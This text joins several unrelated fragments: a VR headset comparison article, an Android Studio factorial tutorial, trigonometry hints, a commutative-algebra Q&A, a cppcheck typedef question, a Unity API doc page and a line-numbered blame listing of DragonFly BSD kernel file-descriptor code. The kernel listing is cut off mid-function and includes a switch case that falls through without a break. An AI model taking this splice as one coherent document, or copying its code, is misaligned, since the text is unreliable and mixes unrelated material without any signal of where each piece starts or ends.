Vive Cosmos Elite vs. Samsung HMD Odyssey+
There’s always been fierce competition in the virtual reality gaming market, and two of the most prominent players in this field are the Vive Cosmos Elite and the Samsung HMD Odyssey+. These headsets offer a unique and immersive gaming experience, but which one stands out? This article will compare these two VR powerhouses in-depth, analyzing their key features, specs, user experiences, and pricing.
What is Virtual Reality Gaming?
Virtual reality gaming is a form of gaming that utilizes virtual reality technology to create a fully immersive 3D gaming environment. It’s a revolutionary way to play, allowing gamers to step inside their favorite games and interact with them in ways that were once only possible in science fiction. The player is typically immersed in the game using a head-mounted display (HMD) and motion-tracking technology, which responds to the player’s movements and adjusts the game environment accordingly.
The beauty of VR gaming is its ability to create a sense of presence, making you feel as if you’re truly inside the game world. It’s not just about seeing a game on a screen; it’s about being part of it. This level of immersion can lead to incredibly realistic and intense gaming experiences that traditional video games can’t match.
Overview of Vive Cosmos Elite
The Vive Cosmos Elite is a high-end VR headset developed by HTC. It’s designed to offer a premium VR experience with high-resolution screens, a wide field of view, and precise motion tracking. The Cosmos Elite is not a standalone headset: it tethers to a VR-ready PC and uses external SteamVR base stations for tracking.
The headset is comfortable, with adjustable straps and a soft face cushion. It also includes built-in headphones for an immersive audio experience. With the Vive Cosmos Elite, you’re not just playing a game but stepping inside it.
Overview of Samsung HMD Odyssey+
The Samsung HMD Odyssey+ is another top-tier VR offering from a well-known electronics brand. Like the Vive Cosmos Elite, it is powered by a PC: it’s a Windows Mixed Reality headset that plugs into a VR-capable computer. The Odyssey+ boasts impressive visual fidelity, with a high resolution, a wide field of view, and Anti-Screen Door Effect technology that minimizes visual noise.
The Odyssey+ is notable for its comfort, adjustable headband, and lightweight design. It also includes built-in AKG headphones for high-quality audio and has integrated voice command functionality. The Samsung HMD Odyssey+ delivers a high-quality, immersive VR experience.
Key Features of Vive Cosmos Elite
The Vive Cosmos Elite boasts several impressive features. Firstly, it offers a high resolution of 2880 x 1700 pixels, providing crisp and clear visuals. It also has a wide 110-degree field of view, allowing for a more immersive gaming experience. Another standout feature is the headset’s precise motion tracking. The Cosmos Elite uses SteamVR Tracking technology, providing 360-degree tracking and sub-millimeter precision. This means your movements in the real world translate accurately into the virtual world.
Key Features of Samsung HMD Odyssey+
The Samsung HMD Odyssey+ also has an array of impressive features. It offers a high resolution of 2880 x 1600 pixels and a wide 110-degree field of view. A bonus is its anti-screen door effect technology, which reduces visual noise and creates a more immersive experience.
The Odyssey+ also has excellent motion tracking, using Inside-Out Position tracking. This removes the need for external sensors, making the setup process simpler and more user-friendly. Additionally, the headset includes integrated voice command functionality, allowing for hands-free control.
Comparing the Specs: Vive Cosmos Elite vs. Samsung HMD Odyssey+
When looking at the specs, both the Vive Cosmos Elite and the Samsung HMD Odyssey+ are quite similar. They both offer high-resolution displays and wide fields of view. However, the Cosmos Elite has a slightly higher resolution, which could lead to sharper visuals.
In terms of tracking, both headsets offer precise motion tracking, but they use different technologies. The Cosmos Elite uses SteamVR Tracking, while the Odyssey+ uses Inside-Out Position tracking. The choice between these could come down to personal preference, as some users may prefer the simplicity of Inside-Out tracking, while others might prefer the precision of SteamVR.
User Experience: Vive Cosmos Elite vs. Samsung HMD Odyssey+
The user experience is a crucial factor in any VR headset. The Vive Cosmos Elite and the Samsung HMD Odyssey+ provide a comfortable fit with adjustable straps and soft cushions. However, some users have reported that the Cosmos Elite is slightly more comfortable due to its lighter weight. Regarding gameplay, both headsets offer immersive experiences with high-quality visuals and sound. However, the Cosmos Elite’s slightly higher resolution and SteamVR tracking could provide a slightly more immersive experience.
Pricing: Vive Cosmos Elite vs. Samsung HMD Odyssey+
Price is a significant factor when choosing a VR headset. The Vive Cosmos Elite is generally more expensive than the Samsung HMD Odyssey+. However, considering its higher resolution and advanced tracking technology, some might argue that the additional cost is justified.
Final Verdict: Which is better – Vive Cosmos Elite or Samsung HMD Odyssey+?
Choosing between the Vive Cosmos Elite and the Samsung HMD Odyssey+ is difficult, as both are excellent VR headsets with similar specs and features. However, if price is a significant factor, the Samsung HMD Odyssey+ might be the better choice. If you’re looking for the highest resolution and most precise tracking, the Vive Cosmos Elite might be worth the extra investment.
Conclusion
The Vive Cosmos Elite and the Samsung HMD Odyssey+ are both formidable contenders in the VR gaming market. They each offer unique advantages, with the Cosmos Elite boasting higher resolution and advanced tracking technology and the Odyssey+ offering a more affordable price point. Ultimately, the choice between the two will depend on your specific needs and preferences.
Frequently Asked Questions:
Do I need a powerful PC for VR gaming?
Yes, VR gaming typically requires a powerful PC with a robust graphics card to run smoothly.
Can I use these VR headsets with glasses?
Yes, the Vive Cosmos Elite and the Samsung HMD Odyssey+ are designed to accommodate users wearing glasses.
Are these VR headsets wireless?
No, both the Vive Cosmos Elite and the Samsung HMD Odyssey+ require a wired connection to a PC.
How long can I play VR games without feeling tired or dizzy?
This varies from person to person. If you’re new to VR, start with short sessions and take regular breaks until you know your own tolerance.
Can I use these VR headsets for non-gaming purposes?
Both headsets can be used for various applications, including virtual tours, simulations, and educational programs.
Android Studio
Android Studio Lesson 8 - Using the Random Function
Sunday, May 10, 2020 · Adem KORKMAZ · 1226
An application that computes the factorial of a randomly generated number using the Random function of Android Studio's Math class. Random number generation is also one of the most commonly used techniques behind lottery-style draws. With this video you will be able to build this easily as a mobile application.
Layout Design
Factorial Calculation Application
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    TextView sayi, fak;
    Button btn;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        tanimlama();

        btn.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                // Math.random() returns a double in [0, 1); scale it to 1..100
                int rndSayi = (int) (Math.random() * 100 + 1);
                sayi.setText(" " + rndSayi);
                fakHesapla(rndSayi);
            }
        });
    }

    // Function where the factorial is computed
    public void fakHesapla(int a) {
        double sonuc = 1;
        for (int i = 1; i <= a; i++) {
            sonuc = sonuc * i;
        }
        fak.setText(" " + sonuc);
    }

    // Function where the view objects are bound
    public void tanimlama() {
        sayi = findViewById(R.id.urtSayi);
        fak = findViewById(R.id.fakt);
        btn = findViewById(R.id.btn);
    }
}
Factorial Calculation Application with Android Studio
Generating Random Numbers with Android Studio
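Outside of Android, the same two ideas — scaling Math.random() to the range 1..100 and computing the factorial iteratively — can be sketched as a plain Java program. The class and method names below are illustrative, not from the tutorial:

```java
public class FactorialDemo {

    // Math.random() returns a double in [0, 1); multiplying by 100 and
    // adding 1 yields an integer in the range 1..100 inclusive.
    static int randomNumber() {
        return (int) (Math.random() * 100 + 1);
    }

    // Iterative factorial. double is used, as in the tutorial, because
    // factorials overflow int and long very quickly (21! already exceeds long).
    static double factorial(int n) {
        double result = 1;
        for (int i = 1; i <= n; i++) {
            result *= i;
        }
        return result;
    }

    public static void main(String[] args) {
        int n = randomNumber();
        System.out.println(n + "! = " + factorial(n));
    }
}
```

Running it from the command line prints a line such as "7! = 5040.0", with a different random value each run.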
Suggestion
Give the general solutions of the following equations
1. \(2\sin 3\theta - 7 \cos 2\theta + \sin \theta + 1 = 0\),
How might we reduce the number of different multiples of \(\theta\)?
Can we turn the LHS into a function of \(\sin \theta\) alone, or of \(\cos \theta\) alone?
2. \(\cos\theta - \sin 2\theta + \cos 3\theta - \sin 4\theta = 0\).
How can we simplify an expression like \(\cos A + \cos B\)? Are there any identities that could help us?
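One possible route is the sum-to-product identities, which pair the terms up nicely:

\[\cos A + \cos B = 2\cos\tfrac{A+B}{2}\cos\tfrac{A-B}{2}, \qquad \sin A + \sin B = 2\sin\tfrac{A+B}{2}\cos\tfrac{A-B}{2}.\]

Applying the first to \(\cos\theta + \cos 3\theta\) gives \(2\cos 2\theta\cos\theta\), and the second turns \(\sin 2\theta + \sin 4\theta\) into \(2\sin 3\theta\cos\theta\), so the left-hand side factorises as \(2\cos\theta\,(\cos 2\theta - \sin 3\theta)\) and each factor can be set to zero separately.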
Let $k$ be a field, and $f:k[x_1,\ldots,x_n]\to k[y_1,\ldots,y_m]$ a $k$-algebra homomorphism. Given $r_1,\ldots,r_k\in k[y_1,\ldots,y_m]$, is there an algorithm for producing a finite generating set for the ideal $f^{-1}((r_1,\ldots,r_k))$?
• I wonder if there is even a reasonable algorithm for finding generators of $f^{-1}(0)$. – Thomas Andrews Jul 18 '13 at 16:42
• Will Gröbner bases help? – Robert Lewis Jul 18 '13 at 17:37
The answer is yes. The ideal $f^{-1}((r_1,\ldots,r_k))$ is exactly the kernel of the composite map
$$k[x_1, \dots, x_n] \xrightarrow{f} k[y_1,\ldots,y_m] \longrightarrow k[y_1,\ldots,y_m]/(r_1,\ldots,r_k),$$
that is, the kernel of a $k$-algebra map into a quotient $S$ of a polynomial ring. Such kernels can be computed by Gröbner-basis elimination, and Macaulay2's kernel command calculates them directly.
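As an illustration, a possible Macaulay2 session; the rings, the ideal, and the images of the variables here are made-up examples rather than anything from the question:

```
R = QQ[x_1, x_2]                 -- the source ring k[x_1,...,x_n]
S = QQ[y_1, y_2]                 -- the target ring k[y_1,...,y_m]
I = ideal(y_1*y_2)               -- the ideal (r_1,...,r_k)
f = map(S/I, R, {y_1^2, y_2^2})  -- the composite R -> S -> S/I
kernel f                         -- generators of f^{-1}((r_1,...,r_k))
```

Under the hood this is Gröbner-basis elimination in a ring containing both sets of variables.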
This is a cppcheck warning message.
Variable 'BUFFER_INFO' hides typedef with same name
BUFFER_INFO is defined as follows.
typedef struct tagBufferInfo
{
CRITICAL_SECTION cs;
Buffer* pBuffer1;
Buffer* pBuffer2;
Buffer* pLoggingBuffer;
Buffer* pSendingBuffer;
}BUFFER_INFO, *PBUFFER_INFO;
And I wrote,
PBUFFER_INFO p = new BUFFER_INFO; // causes the warning.
What is the problem? How do I solve it?
Thanks.
This looks like it might be a cppcheck bug.
However... what you have written is bad C++ style, prefer:
struct BUFFER_INFO
{
CRITICAL_SECTION cs;
Buffer* pBuffer1;
Buffer* pBuffer2;
Buffer* pLoggingBuffer;
Buffer* pSendingBuffer;
};
I would also observe that it is not good C++ style to use all-uppercase type names (all-caps names are conventionally reserved for macros and constants), and that typedefs which hide the fact that something is a pointer are usually a bad idea.
In C++ you can directly use the struct name without the struct keyword, so you don't need the typedef to get the BUFFER_INFO name. For the pointer alias you can still keep a typedef if you want one.
public UI.Selectable FindSelectable (Vector3 dir);
Parameters
dir	The direction in which to search for a neighbouring Selectable object.
Returns
Selectable	The neighbouring Selectable object found in that direction, or null if none is found.
Description
Finds the Selectable object next to this one.
The direction of movement is specified as a Vector3.
using UnityEngine;
using System.Collections;
using UnityEngine.UI; // required when using UI elements in scripts

public class ExampleClass : MonoBehaviour
{
    // Sets the direction as "Up" (Y is positive).
    public Vector3 direction = new Vector3(0, 1, 0);
    public Button btnMain;

    public void Start()
    {
        // Finds and assigns the selectable above the main button.
        Selectable newSelectable = btnMain.FindSelectable(direction);

        Debug.Log(newSelectable.name);
    }
}
The recent file descriptor work is significant enough to deserve a
[dragonfly.git] / sys / kern / kern_descrip.c
CommitLineData
984263bc 1/*
29d211fb
MD
2 * Copyright (c) 2005 The DragonFly Project. All rights reserved.
3 *
4 * This code is derived from software contributed to The DragonFly Project
5 * by Jeffrey Hsu.
6 *
7 * Redistribution and use in source and binary forms, with or without
8 * modification, are permitted provided that the following conditions
9 * are met:
10 *
11 * 1. Redistributions of source code must retain the above copyright
12 * notice, this list of conditions and the following disclaimer.
13 * 2. Redistributions in binary form must reproduce the above copyright
14 * notice, this list of conditions and the following disclaimer in
15 * the documentation and/or other materials provided with the
16 * distribution.
17 * 3. Neither the name of The DragonFly Project nor the names of its
18 * contributors may be used to endorse or promote products derived
19 * from this software without specific, prior written permission.
20 *
21 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
22 * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
23 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
24 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
25 * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
26 * INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING,
27 * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
28 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
29 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
30 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
31 * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
32 * SUCH DAMAGE.
33 *
34 *
984263bc
MD
35 * Copyright (c) 1982, 1986, 1989, 1991, 1993
36 * The Regents of the University of California. All rights reserved.
37 * (c) UNIX System Laboratories, Inc.
38 * All or some portions of this file are derived from material licensed
39 * to the University of California by American Telephone and Telegraph
40 * Co. or Unix System Laboratories, Inc. and are reproduced herein with
41 * the permission of UNIX System Laboratories, Inc.
42 *
43 * Redistribution and use in source and binary forms, with or without
44 * modification, are permitted provided that the following conditions
45 * are met:
46 * 1. Redistributions of source code must retain the above copyright
47 * notice, this list of conditions and the following disclaimer.
48 * 2. Redistributions in binary form must reproduce the above copyright
49 * notice, this list of conditions and the following disclaimer in the
50 * documentation and/or other materials provided with the distribution.
51 * 3. All advertising materials mentioning features or use of this software
52 * must display the following acknowledgement:
53 * This product includes software developed by the University of
54 * California, Berkeley and its contributors.
55 * 4. Neither the name of the University nor the names of its contributors
56 * may be used to endorse or promote products derived from this software
57 * without specific prior written permission.
58 *
59 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
60 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
61 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
62 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
63 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
64 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
65 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
66 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
67 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
68 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
69 * SUCH DAMAGE.
70 *
71 * @(#)kern_descrip.c 8.6 (Berkeley) 4/19/94
c4cb6d8b 72 * $FreeBSD: src/sys/kern/kern_descrip.c,v 1.81.2.19 2004/02/28 00:43:31 tegge Exp $
29d211fb 73 * $DragonFly: src/sys/kern/kern_descrip.c,v 1.45 2005/06/22 19:58:44 dillon Exp $
984263bc
MD
74 */
75
76#include "opt_compat.h"
77#include <sys/param.h>
78#include <sys/systm.h>
79#include <sys/malloc.h>
80#include <sys/sysproto.h>
81#include <sys/conf.h>
82#include <sys/filedesc.h>
83#include <sys/kernel.h>
84#include <sys/sysctl.h>
85#include <sys/vnode.h>
86#include <sys/proc.h>
fad57d0e 87#include <sys/nlookup.h>
984263bc
MD
88#include <sys/file.h>
89#include <sys/stat.h>
90#include <sys/filio.h>
91#include <sys/fcntl.h>
92#include <sys/unistd.h>
93#include <sys/resourcevar.h>
94#include <sys/event.h>
dda4b42b 95#include <sys/kern_syscall.h>
1c55bd1c 96#include <sys/kcore.h>
7b124c9f 97#include <sys/kinfo.h>
984263bc
MD
98
99#include <vm/vm.h>
100#include <vm/vm_extern.h>
101
e43a034f 102#include <sys/thread2.h>
dadab5e9
MD
103#include <sys/file2.h>
104
984263bc
MD
105static MALLOC_DEFINE(M_FILEDESC, "file desc", "Open file descriptor table");
106static MALLOC_DEFINE(M_FILEDESC_TO_LEADER, "file desc to leader",
107 "file desc to leader structures");
108MALLOC_DEFINE(M_FILE, "file", "Open file structure");
109static MALLOC_DEFINE(M_SIGIO, "sigio", "sigio structures");
110
111static d_open_t fdopen;
112#define NUMFDESC 64
113
114#define CDEV_MAJOR 22
115static struct cdevsw fildesc_cdevsw = {
fabb8ceb
MD
116 /* name */ "FD",
117 /* maj */ CDEV_MAJOR,
118 /* flags */ 0,
119 /* port */ NULL,
455fcd7e 120 /* clone */ NULL,
fabb8ceb 121
984263bc
MD
122 /* open */ fdopen,
123 /* close */ noclose,
124 /* read */ noread,
125 /* write */ nowrite,
126 /* ioctl */ noioctl,
127 /* poll */ nopoll,
128 /* mmap */ nommap,
129 /* strategy */ nostrategy,
984263bc 130 /* dump */ nodump,
fabb8ceb 131 /* psize */ nopsize
984263bc
MD
132};
133
402ed7e1
RG
134static int badfo_readwrite (struct file *fp, struct uio *uio,
135 struct ucred *cred, int flags, struct thread *td);
136static int badfo_ioctl (struct file *fp, u_long com, caddr_t data,
137 struct thread *td);
138static int badfo_poll (struct file *fp, int events,
139 struct ucred *cred, struct thread *td);
140static int badfo_kqfilter (struct file *fp, struct knote *kn);
141static int badfo_stat (struct file *fp, struct stat *sb, struct thread *td);
142static int badfo_close (struct file *fp, struct thread *td);
984263bc
MD
143
144/*
145 * Descriptor management.
146 */
147struct filelist filehead; /* head of list of open files */
148int nfiles; /* actual number of open files */
149extern int cmask;
150
151/*
152 * System calls on descriptors.
153 */
984263bc
MD
154/* ARGSUSED */
155int
41c20dac 156getdtablesize(struct getdtablesize_args *uap)
984263bc 157{
41c20dac 158 struct proc *p = curproc;
984263bc 159
c7114eea 160 uap->sysmsg_result =
984263bc
MD
161 min((int)p->p_rlimit[RLIMIT_NOFILE].rlim_cur, maxfilesperproc);
162 return (0);
163}
164
165/*
166 * Duplicate a file descriptor to a particular value.
167 *
168 * note: keep in mind that a potential race condition exists when closing
169 * descriptors from a shared descriptor table (via rfork).
170 */
984263bc
MD
171/* ARGSUSED */
172int
41c20dac 173dup2(struct dup2_args *uap)
984263bc 174{
dda4b42b
DRJ
175 int error;
176
177 error = kern_dup(DUP_FIXED, uap->from, uap->to, uap->sysmsg_fds);
178
179 return (error);
984263bc
MD
180}
181
182/*
183 * Duplicate a file descriptor.
184 */
984263bc
MD
185/* ARGSUSED */
186int
41c20dac 187dup(struct dup_args *uap)
984263bc 188{
dda4b42b 189 int error;
984263bc 190
dda4b42b
DRJ
191 error = kern_dup(DUP_VARIABLE, uap->fd, 0, uap->sysmsg_fds);
192
193 return (error);
984263bc
MD
194}
195
984263bc 196int
dda4b42b 197kern_fcntl(int fd, int cmd, union fcntl_dat *dat)
984263bc 198{
dadab5e9
MD
199 struct thread *td = curthread;
200 struct proc *p = td->td_proc;
41c20dac
MD
201 struct filedesc *fdp = p->p_fd;
202 struct file *fp;
203 char *pop;
984263bc 204 struct vnode *vp;
984263bc 205 u_int newmin;
dda4b42b 206 int tmp, error, flg = F_POSIX;
984263bc 207
dadab5e9
MD
208 KKASSERT(p);
209
dda4b42b 210 if ((unsigned)fd >= fdp->fd_nfiles ||
0679adc4 211 (fp = fdp->fd_files[fd].fp) == NULL)
984263bc 212 return (EBADF);
0679adc4 213 pop = &fdp->fd_files[fd].fileflags;
984263bc 214
dda4b42b 215 switch (cmd) {
984263bc 216 case F_DUPFD:
dda4b42b 217 newmin = dat->fc_fd;
984263bc 218 if (newmin >= p->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
dda4b42b 219 newmin > maxfilesperproc)
984263bc 220 return (EINVAL);
dda4b42b
DRJ
221 error = kern_dup(DUP_VARIABLE, fd, newmin, &dat->fc_fd);
222 return (error);
984263bc
MD
223
224 case F_GETFD:
dda4b42b 225 dat->fc_cloexec = (*pop & UF_EXCLOSE) ? FD_CLOEXEC : 0;
984263bc
MD
226 return (0);
227
228 case F_SETFD:
229 *pop = (*pop &~ UF_EXCLOSE) |
dda4b42b 230 (dat->fc_cloexec & FD_CLOEXEC ? UF_EXCLOSE : 0);
984263bc
MD
231 return (0);
232
233 case F_GETFL:
dda4b42b 234 dat->fc_flags = OFLAGS(fp->f_flag);
984263bc
MD
235 return (0);
236
237 case F_SETFL:
238 fhold(fp);
239 fp->f_flag &= ~FCNTLFLAGS;
dda4b42b 240 fp->f_flag |= FFLAGS(dat->fc_flags & ~O_ACCMODE) & FCNTLFLAGS;
984263bc 241 tmp = fp->f_flag & FNONBLOCK;
dadab5e9 242 error = fo_ioctl(fp, FIONBIO, (caddr_t)&tmp, td);
984263bc 243 if (error) {
dadab5e9 244 fdrop(fp, td);
984263bc
MD
245 return (error);
246 }
247 tmp = fp->f_flag & FASYNC;
dadab5e9 248 error = fo_ioctl(fp, FIOASYNC, (caddr_t)&tmp, td);
984263bc 249 if (!error) {
dadab5e9 250 fdrop(fp, td);
984263bc
MD
251 return (0);
252 }
253 fp->f_flag &= ~FNONBLOCK;
254 tmp = 0;
dda4b42b 255 fo_ioctl(fp, FIONBIO, (caddr_t)&tmp, td);
dadab5e9 256 fdrop(fp, td);
984263bc
MD
257 return (error);
258
259 case F_GETOWN:
260 fhold(fp);
dda4b42b 261 error = fo_ioctl(fp, FIOGETOWN, (caddr_t)&dat->fc_owner, td);
dadab5e9 262 fdrop(fp, td);
984263bc
MD
263 return(error);
264
265 case F_SETOWN:
266 fhold(fp);
dda4b42b 267 error = fo_ioctl(fp, FIOSETOWN, (caddr_t)&dat->fc_owner, td);
dadab5e9 268 fdrop(fp, td);
984263bc
MD
269 return(error);
270
271 case F_SETLKW:
272 flg |= F_WAIT;
273 /* Fall into F_SETLK */
274
275 case F_SETLK:
276 if (fp->f_type != DTYPE_VNODE)
277 return (EBADF);
278 vp = (struct vnode *)fp->f_data;
279
280 /*
281 * copyin/lockop may block
282 */
283 fhold(fp);
dda4b42b
DRJ
284 if (dat->fc_flock.l_whence == SEEK_CUR)
285 dat->fc_flock.l_start += fp->f_offset;
984263bc 286
dda4b42b 287 switch (dat->fc_flock.l_type) {
984263bc
MD
288 case F_RDLCK:
289 if ((fp->f_flag & FREAD) == 0) {
290 error = EBADF;
291 break;
292 }
293 p->p_leader->p_flag |= P_ADVLOCK;
294 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_SETLK,
dda4b42b 295 &dat->fc_flock, flg);
984263bc
MD
296 break;
297 case F_WRLCK:
298 if ((fp->f_flag & FWRITE) == 0) {
299 error = EBADF;
300 break;
301 }
302 p->p_leader->p_flag |= P_ADVLOCK;
303 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_SETLK,
dda4b42b 304 &dat->fc_flock, flg);
984263bc
MD
305 break;
306 case F_UNLCK:
307 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_UNLCK,
dda4b42b 308 &dat->fc_flock, F_POSIX);
984263bc
MD
309 break;
310 default:
311 error = EINVAL;
312 break;
313 }
314 /* Check for race with close */
dda4b42b 315 if ((unsigned) fd >= fdp->fd_nfiles ||
0679adc4 316 fp != fdp->fd_files[fd].fp) {
dda4b42b
DRJ
317 dat->fc_flock.l_whence = SEEK_SET;
318 dat->fc_flock.l_start = 0;
319 dat->fc_flock.l_len = 0;
320 dat->fc_flock.l_type = F_UNLCK;
984263bc 321 (void) VOP_ADVLOCK(vp, (caddr_t)p->p_leader,
dda4b42b 322 F_UNLCK, &dat->fc_flock, F_POSIX);
984263bc 323 }
dadab5e9 324 fdrop(fp, td);
984263bc
MD
325 return(error);
326
327 case F_GETLK:
328 if (fp->f_type != DTYPE_VNODE)
329 return (EBADF);
330 vp = (struct vnode *)fp->f_data;
331 /*
332 * copyin/lockop may block
333 */
334 fhold(fp);
dda4b42b
DRJ
335 if (dat->fc_flock.l_type != F_RDLCK &&
336 dat->fc_flock.l_type != F_WRLCK &&
337 dat->fc_flock.l_type != F_UNLCK) {
dadab5e9 338 fdrop(fp, td);
984263bc
MD
339 return (EINVAL);
340 }
dda4b42b
DRJ
341 if (dat->fc_flock.l_whence == SEEK_CUR)
342 dat->fc_flock.l_start += fp->f_offset;
984263bc 343 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_GETLK,
dda4b42b 344 &dat->fc_flock, F_POSIX);
dadab5e9 345 fdrop(fp, td);
984263bc
MD
346 return(error);
347 default:
348 return (EINVAL);
349 }
350 /* NOTREACHED */
351}
352
dda4b42b
DRJ
353/*
354 * The file control system call.
355 */
356int
357fcntl(struct fcntl_args *uap)
358{
359 union fcntl_dat dat;
360 int error;
361
362 switch (uap->cmd) {
363 case F_DUPFD:
364 dat.fc_fd = uap->arg;
365 break;
366 case F_SETFD:
367 dat.fc_cloexec = uap->arg;
368 break;
369 case F_SETFL:
370 dat.fc_flags = uap->arg;
371 break;
372 case F_SETOWN:
373 dat.fc_owner = uap->arg;
374 break;
375 case F_SETLKW:
376 case F_SETLK:
377 case F_GETLK:
378 error = copyin((caddr_t)uap->arg, &dat.fc_flock,
379 sizeof(struct flock));
380 if (error)
381 return (error);
382 break;
383 }
384
385 error = kern_fcntl(uap->fd, uap->cmd, &dat);
386
387 if (error == 0) {
388 switch (uap->cmd) {
389 case F_DUPFD:
390 uap->sysmsg_result = dat.fc_fd;
391 break;
392 case F_GETFD:
393 uap->sysmsg_result = dat.fc_cloexec;
394 break;
395 case F_GETFL:
396 uap->sysmsg_result = dat.fc_flags;
397 break;
398 case F_GETOWN:
399 uap->sysmsg_result = dat.fc_owner;
400 case F_GETLK:
401 error = copyout(&dat.fc_flock, (caddr_t)uap->arg,
402 sizeof(struct flock));
403 break;
404 }
405 }
406
407 return (error);
408}
409
984263bc
MD
410/*
411 * Common code for dup, dup2, and fcntl(F_DUPFD).
dda4b42b
DRJ
412 *
413 * The type flag can be either DUP_FIXED or DUP_VARIABLE. DUP_FIXED tells
414 * kern_dup() to destructively dup over an existing file descriptor if new
415 * is already open. DUP_VARIABLE tells kern_dup() to find the lowest
416 * unused file descriptor that is greater than or equal to new.
984263bc 417 */
dda4b42b
DRJ
418int
419kern_dup(enum dup_type type, int old, int new, int *res)
984263bc 420{
dda4b42b
DRJ
421 struct thread *td = curthread;
422 struct proc *p = td->td_proc;
423 struct filedesc *fdp = p->p_fd;
984263bc
MD
424 struct file *fp;
425 struct file *delfp;
426 int holdleaders;
69908319 427 boolean_t fdalloced = FALSE;
dda4b42b
DRJ
428 int error, newfd;
429
430 /*
431 * Verify that we have a valid descriptor to dup from and
432 * possibly to dup to.
433 */
434 if (old < 0 || new < 0 || new > p->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
435 new >= maxfilesperproc)
436 return (EBADF);
0679adc4 437 if (old >= fdp->fd_nfiles || fdp->fd_files[old].fp == NULL)
dda4b42b
DRJ
438 return (EBADF);
439 if (type == DUP_FIXED && old == new) {
440 *res = new;
441 return (0);
442 }
0679adc4 443 fp = fdp->fd_files[old].fp;
dda4b42b
DRJ
444 fhold(fp);
445
446 /*
447 * Expand the table for the new descriptor if needed. This may
448 * block and drop and reacquire the fidedesc lock.
449 */
450 if (type == DUP_VARIABLE || new >= fdp->fd_nfiles) {
451 error = fdalloc(p, new, &newfd);
452 if (error) {
453 fdrop(fp, td);
454 return (error);
455 }
69908319 456 fdalloced = TRUE;
dda4b42b
DRJ
457 }
458 if (type == DUP_VARIABLE)
459 new = newfd;
460
461 /*
462 * If the old file changed out from under us then treat it as a
463 * bad file descriptor. Userland should do its own locking to
464 * avoid this case.
465 */
0679adc4
MD
466 if (fdp->fd_files[old].fp != fp) {
467 if (fdp->fd_files[new].fp == NULL) {
69908319
JH
468 if (fdalloced)
469 fdreserve(fdp, newfd, -1);
dda4b42b
DRJ
470 if (new < fdp->fd_freefile)
471 fdp->fd_freefile = new;
472 while (fdp->fd_lastfile > 0 &&
0679adc4 473 fdp->fd_files[fdp->fd_lastfile].fp == NULL)
dda4b42b
DRJ
474 fdp->fd_lastfile--;
475 }
476 fdrop(fp, td);
477 return (EBADF);
478 }
479 KASSERT(old != new, ("new fd is same as old"));
984263bc
MD
480
481 /*
482 * Save info on the descriptor being overwritten. We have
483 * to do the unmap now, but we cannot close it without
484 * introducing an ownership race for the slot.
485 */
0679adc4 486 delfp = fdp->fd_files[new].fp;
984263bc
MD
487 if (delfp != NULL && p->p_fdtol != NULL) {
488 /*
489 * Ask fdfree() to sleep to ensure that all relevant
490 * process leaders can be traversed in closef().
491 */
492 fdp->fd_holdleaderscount++;
493 holdleaders = 1;
494 } else
495 holdleaders = 0;
dda4b42b
DRJ
496 KASSERT(delfp == NULL || type == DUP_FIXED,
497 ("dup() picked an open file"));
984263bc 498#if 0
0679adc4 499 if (delfp && (fdp->fd_files[new].fileflags & UF_MAPPED))
984263bc
MD
500 (void) munmapfd(p, new);
501#endif
502
503 /*
504 * Duplicate the source descriptor, update lastfile
505 */
984263bc
MD
506 if (new > fdp->fd_lastfile)
507 fdp->fd_lastfile = new;
0679adc4 508 if (!fdalloced && fdp->fd_files[new].fp == NULL)
69908319 509 fdreserve(fdp, new, 1);
0679adc4
MD
510 fdp->fd_files[new].fp = fp;
511 fdp->fd_files[new].fileflags =
512 fdp->fd_files[old].fileflags & ~UF_EXCLOSE;
dda4b42b 513 *res = new;
984263bc
MD
514
515 /*
516 * If we dup'd over a valid file, we now own the reference to it
517 * and must dispose of it using closef() semantics (as if a
518 * close() were performed on it).
519 */
520 if (delfp) {
dadab5e9 521 (void) closef(delfp, td);
984263bc
MD
522 if (holdleaders) {
